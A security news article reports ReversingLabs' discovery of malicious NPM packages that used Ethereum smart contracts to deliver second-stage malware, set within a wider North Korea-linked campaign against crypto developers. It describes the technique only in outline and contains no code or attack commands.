Hackers Exploit Ethereum Smart Contracts to Spread Malware

A New Twist in Crypto Cyberattacks

Ethereum smart contracts are being weaponized to deliver malware, according to findings by security firm ReversingLabs. The company identified two malicious Node Package Manager (NPM) libraries—colortoolsv2 and mimelib2—that used Ethereum contracts as part of a malware distribution chain.

The technique forms part of what researchers describe as a “sophisticated campaign” aimed at compromising developers via poisoned blockchain-related code libraries.

How the Attack Works

The infected NPM packages contained two files. One ran a script that accessed an Ethereum smart contract, which then provided the link to download the second-stage malware. This design allowed attackers to evade detection and use blockchain’s decentralized nature as an unconventional delivery method. 

ReversingLabs uncovered that the malicious packages were connected to a wider network of GitHub repositories, many of which were branded as crypto trading bots or token sniping tools. While the NPM packages themselves were relatively simple, the repositories were dressed up to look authentic, with thousands of commits, stars, and even fake contributors.

Open Source: A Hidden Risk

The campaign highlights the dangers of trusting open-source software without verification. Attackers appear to be exploiting the assumption that public repositories are automatically safe because they are openly visible.

The poisoned packages demonstrate how fake reputational signals—like stars and activity—can lull developers into installing dangerous software.

Binance Identifies DPRK as Major Threat

Major crypto exchange Binance has already flagged package poisoning as a growing attack vector linked to North Korean state actors. Employees are required to carefully audit NPM libraries as part of internal security protocols.

Chainalysis previously reported that North Korean hackers were responsible for 61% of all stolen crypto in 2024, amounting to $1.3 billion. More recently, the FBI attributed the record $1.4 billion Bybit hack to DPRK-affiliated attackers, underscoring the scale of the threat.

A Growing Challenge for the Crypto Industry

The use of Ethereum smart contracts for malware delivery represents a significant escalation in tactics. Unlike traditional attack methods, this approach leverages blockchain’s transparency and decentralization, making it harder to shut down.

With state-sponsored hackers continually innovating, the crypto industry faces mounting pressure to bolster defenses. As Valentić warned, the sophistication of these campaigns signals that attackers are becoming more strategic, and open-source communities remain a prime target.

For developers and exchanges alike, vigilance is no longer optional—it is the frontline defense against a new era of blockchain-enabled cybercrime.